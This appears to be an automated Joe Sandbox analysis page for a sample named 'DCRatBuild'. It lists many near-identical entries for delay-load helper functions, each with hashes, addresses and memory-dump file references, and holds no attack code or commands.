Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 91e9d6c7750b6b1ce64392f82fe857dce5b6368792bc9653f8ebc5b3def9a059
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: 91e9d6c7750b6b1ce64392f82fe857dce5b6368792bc9653f8ebc5b3def9a059
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 64894763ef8dcc04d8e068dd475c00c2e00a84af857742734ac67f1ea3d22fb9
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: 64894763ef8dcc04d8e068dd475c00c2e00a84af857742734ac67f1ea3d22fb9
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8d88a3187fa57dc8734901af78ef623957e91f23c47502c7175b341fb80e3a6f
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: 8d88a3187fa57dc8734901af78ef623957e91f23c47502c7175b341fb80e3a6f
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d652511e758a314777a834a61d02f7f8c3b9d0518275d1829f6376817edc9a85
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: d652511e758a314777a834a61d02f7f8c3b9d0518275d1829f6376817edc9a85
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 078387eaa8148ff743b840f782ad53d09d7622d52a9ad032c0ea2278702a42a5
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: 078387eaa8148ff743b840f782ad53d09d7622d52a9ad032c0ea2278702a42a5
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f75eab8ad60547e4c121b6eb031d5987f65610b3228e4540c4d1029088517fd7
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: f75eab8ad60547e4c121b6eb031d5987f65610b3228e4540c4d1029088517fd7
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 38dac717a3ad19602daefcd2318913895104eeffac78a3fb27217c86d6d969cd
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: 38dac717a3ad19602daefcd2318913895104eeffac78a3fb27217c86d6d969cd
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45323aeba58b8af1cdcf311074042a32d537c194fb39baf5c71d0e6283d120c7
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: 45323aeba58b8af1cdcf311074042a32d537c194fb39baf5c71d0e6283d120c7
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2f69e28d3f776e7b08f80d214f96529a31d6efae4da7136cc4e9155eed52d590
Instruction ID: 9ae8884091c6efa46aa6021ea5dc7ac2bf9a96b0be5be2d48d7e684481202394
Opcode Fuzzy Hash: 2f69e28d3f776e7b08f80d214f96529a31d6efae4da7136cc4e9155eed52d590
Instruction Fuzzy Hash: EDA011E22AA0223C3088A2033C02C3B028CC0C2F2233280AEF838AA080BC8088002832

Function 00B2E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7a72054205cc5c204d805ae5d2bda358fcd18fccc04a186de2c54496175cb4e0
Instruction ID: e05406e313c916f0a9822c842df1f279c7819cd377edf66209bad0d74d0b2db4
Opcode Fuzzy Hash: 7a72054205cc5c204d805ae5d2bda358fcd18fccc04a186de2c54496175cb4e0
Instruction Fuzzy Hash: 56A012E116A0217C304491033C02C37028CC0C1F21331849DF42989080784048001432

Function 00B2E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6911ac6fa760a679457d9800aa990f47e8a6dfe201e10b8355dd89b72f4c0162
Instruction ID: e05406e313c916f0a9822c842df1f279c7819cd377edf66209bad0d74d0b2db4
Opcode Fuzzy Hash: 6911ac6fa760a679457d9800aa990f47e8a6dfe201e10b8355dd89b72f4c0162
Instruction Fuzzy Hash: 56A012E116A0217C304491033C02C37028CC0C1F21331849DF42989080784048001432

Function 00B2E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 717ee56dc6321ad3ab06f93e7ea0dcf906e12d165ac8b0ab10a8add4d4544b98
Instruction ID: e05406e313c916f0a9822c842df1f279c7819cd377edf66209bad0d74d0b2db4
Opcode Fuzzy Hash: 717ee56dc6321ad3ab06f93e7ea0dcf906e12d165ac8b0ab10a8add4d4544b98
Instruction Fuzzy Hash: 56A012E116A0217C304491033C02C37028CC0C1F21331849DF42989080784048001432

Function 00B2E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7e9741995f450a7a8ad00bbb865eba7147f390ab1e4764cc02d45e08ae459e2a
Instruction ID: e05406e313c916f0a9822c842df1f279c7819cd377edf66209bad0d74d0b2db4
Opcode Fuzzy Hash: 7e9741995f450a7a8ad00bbb865eba7147f390ab1e4764cc02d45e08ae459e2a
Instruction Fuzzy Hash: 56A012E116A0217C304491033C02C37028CC0C1F21331849DF42989080784048001432

Function 00B2E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 76bcf19f284ea76bea6962255047ab251e28e8230a72a384902b8f6193cec571
Instruction ID: e05406e313c916f0a9822c842df1f279c7819cd377edf66209bad0d74d0b2db4
Opcode Fuzzy Hash: 76bcf19f284ea76bea6962255047ab251e28e8230a72a384902b8f6193cec571
Instruction Fuzzy Hash: 56A012E116A0217C304491033C02C37028CC0C1F21331849DF42989080784048001432

Function 00B2E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E580

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d491921ba8204e915134352f06198d9fa6df62887b967f7ea067c395975f3467
Instruction ID: a1486320634260b0704f7d89bc572157e32f69f26e60fee937c49c8a88c324e0
Opcode Fuzzy Hash: d491921ba8204e915134352f06198d9fa6df62887b967f7ea067c395975f3467
Instruction Fuzzy Hash: 25A012C117A0217C300411523C02C37018CC0C1F10332849DF42985080B85448041430

Function 00B2E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E580

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6ea96967cb880be02d0d5051ff41f45c54a610862f3d1f66cfdc56c5efc12199
Instruction ID: a1486320634260b0704f7d89bc572157e32f69f26e60fee937c49c8a88c324e0
Opcode Fuzzy Hash: 6ea96967cb880be02d0d5051ff41f45c54a610862f3d1f66cfdc56c5efc12199
Instruction Fuzzy Hash: 25A012C117A0217C300411523C02C37018CC0C1F10332849DF42985080B85448041430

Function 00B2E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E580

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 20d070c038738ed621b103d4f0e272d8de10ad16d3390c52a2fa05720fe70e32
Instruction ID: 414e8c380bef1d7ba3ed5ba4143915a0a8164c06732d401088b6f16510c5f2f5
Opcode Fuzzy Hash: 20d070c038738ed621b103d4f0e272d8de10ad16d3390c52a2fa05720fe70e32
Instruction Fuzzy Hash: 42A012C11B60203C300411623C02C37058CC0D1F11332819DF42895080B85449041430

Function 00B2E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E51F

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
